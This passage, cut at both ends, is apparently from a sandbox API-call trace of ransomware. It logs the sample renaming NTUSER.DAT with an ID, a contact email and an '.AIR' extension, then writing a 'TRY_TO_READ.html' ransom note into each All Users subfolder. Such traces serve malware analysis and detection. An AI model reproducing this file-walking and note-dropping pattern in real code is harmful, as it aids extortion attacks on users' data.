(lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", dwFileAttributes=0x80) returned 1 [0117.424] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned 41 [0117.424] GetProcessHeap () returned 0x2e0000 [0117.424] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb8) returned 0x34af58 [0117.424] lstrcpyW (in: lpString1=0x34af58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" [0117.424] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.12781717671972518758.ex_parvis@aol.com.AIR" [0117.424] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0117.425] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0117.425] GetProcessHeap () returned 0x2e0000 [0117.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34af58 | out: hHeap=0x2e0000) returned 1 [0117.425] CloseHandle (hObject=0xffffffff) returned 0 [0117.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3389c8 | out: hHeap=0x2e0000) returned 1 [0117.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344570 [0117.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0117.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0117.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dec8 | out: hHeap=0x2e0000) returned 1 [0117.425] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x970c6210, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970c6210, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35dd98 [0117.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.425] GetLastError () returned 0x6 [0117.425] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x970c6210, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x970c6210, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0117.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.425] GetLastError () returned 0x6 [0117.425] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0117.425] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.425] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.425] GetLastError () returned 0x6 [0117.425] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.432] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.432] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.433] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.433] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.433] CloseHandle (hObject=0x468) returned 1 [0117.433] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.434] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.434] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.434] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0117.434] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0117.434] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.434] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.434] GetLastError () returned 0x0 [0117.434] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Application Data\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\application data\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.435] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.435] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.436] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.436] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.436] CloseHandle (hObject=0x468) returned 1 [0117.436] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.436] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.437] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.437] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360bd8 | out: hHeap=0x2e0000) returned 1 [0117.437] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0117.437] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.437] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.437] GetLastError () returned 0xb7 [0117.437] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Desktop\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\desktop\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.437] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.437] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.438] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.438] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.438] CloseHandle (hObject=0x468) returned 1 [0117.439] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.439] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.439] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.439] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0117.439] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0117.439] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.439] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.439] GetLastError () returned 0x0 [0117.439] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Documents\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\documents\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.440] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.440] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.441] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.441] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.441] CloseHandle (hObject=0x468) returned 1 [0117.441] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.441] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.441] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.441] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324200 | out: hHeap=0x2e0000) returned 1 [0117.441] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0117.441] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.441] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.441] GetLastError () returned 0x0 [0117.441] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Favorites\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\favorites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.442] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.442] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.443] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.444] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.444] CloseHandle (hObject=0x468) returned 1 [0117.444] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.444] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.444] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.444] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324248 | out: hHeap=0x2e0000) returned 1 [0117.444] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0117.444] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.444] GetLastError () returned 0x0 [0117.444] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0117.444] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.444] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.444] GetLastError () returned 0x0 [0117.444] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\microsoft help\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.446] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x335e78 | out: hHeap=0x2e0000) returned 1 [0117.446] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.447] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.447] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.447] CloseHandle (hObject=0x468) returned 1 [0117.448] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x329348 | out: hHeap=0x2e0000) returned 1 [0117.448] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.448] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.448] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x360c30 | out: hHeap=0x2e0000) returned 1 [0117.448] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0117.448] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.448] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.448] GetLastError () returned 0x0 [0117.448] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Mozilla\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\mozilla\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.448] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.448] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.449] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.449] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.450] CloseHandle (hObject=0x468) returned 1 [0117.450] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.450] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.450] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.450] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324290 | out: hHeap=0x2e0000) returned 1 [0117.450] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0117.450] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.450] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0117.450] GetLastError () returned 0x0 [0117.450] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Oracle\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\oracle\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0117.451] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x338960 | out: hHeap=0x2e0000) returned 1 [0117.451] WriteFile (in: hFile=0x468, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0117.452] WriteFile (in: hFile=0x468, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0117.452] WriteFile (in: hFile=0x468, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0117.452] CloseHandle (hObject=0x468) returned 1 [0117.452] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328710 | out: hHeap=0x2e0000) returned 1 [0117.452] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383da0 | out: hHeap=0x2e0000) returned 1 [0117.452] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0117.452] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384170 | out: hHeap=0x2e0000) returned 1 [0117.452] FindNextFileW (in: hFindFile=0x35dd98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0117.452] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0117.452] RtlAllocateHeap 